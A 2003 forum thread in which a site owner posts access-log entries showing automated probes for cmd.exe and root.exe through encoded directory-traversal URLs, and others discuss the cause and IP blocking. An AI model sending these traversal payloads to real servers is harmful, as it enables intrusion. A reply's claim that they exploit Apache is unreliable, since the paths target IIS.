View previous topic :: View next topic |
Author |
Message |
CANCERMAN Guest
|
Posted: Sun Jan 26, 2003 12:59 pm Post subject: More hacking or/ RE: why i ask |
|
|
I see that other pepole have a problem thats remind of min but their access.log file does no look like min. Some parts are alike but some parts does not remind of other persons log file,
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
213.73.214.209 - - [26/Jan/2003:07:07:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:35 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:38 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:38 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:39 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
62.160.179.5 - - [26/Jan/2003:08:57:22 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 400 429
is this a hackin thing to... :?: |
|
Back to top |
|
|
Bluedog -
Joined: 05 Jan 2003 Posts: 179
|
Posted: Sun Jan 26, 2003 8:25 pm Post subject: |
|
|
yes, this is caused by scripts such as codered trying (and failing) to use an old apache exploit to gain access to your pc. |
|
Back to top |
|
|
Illuminator Guest
|
Posted: Tue Jan 28, 2003 5:38 am Post subject: More hacking or/ RE: why i ask |
|
|
I suppose the next logical question would be - is it possible that one can configure the server to block specific IP addresses, or should this be done via a firewall?
Thanks. |
|
Back to top |
|
|
Illuminator -
Joined: 28 Jan 2003 Posts: 1
|
Posted: Tue Jan 28, 2003 5:51 am Post subject: |
|
|
Nevermind....
I will examine some other avenues of blocking the IP involved.
I actually read the other posts to understand that the server itself does not yet allow the capability of blocking IPs.
Thanks. |
|
Back to top |
|
|
|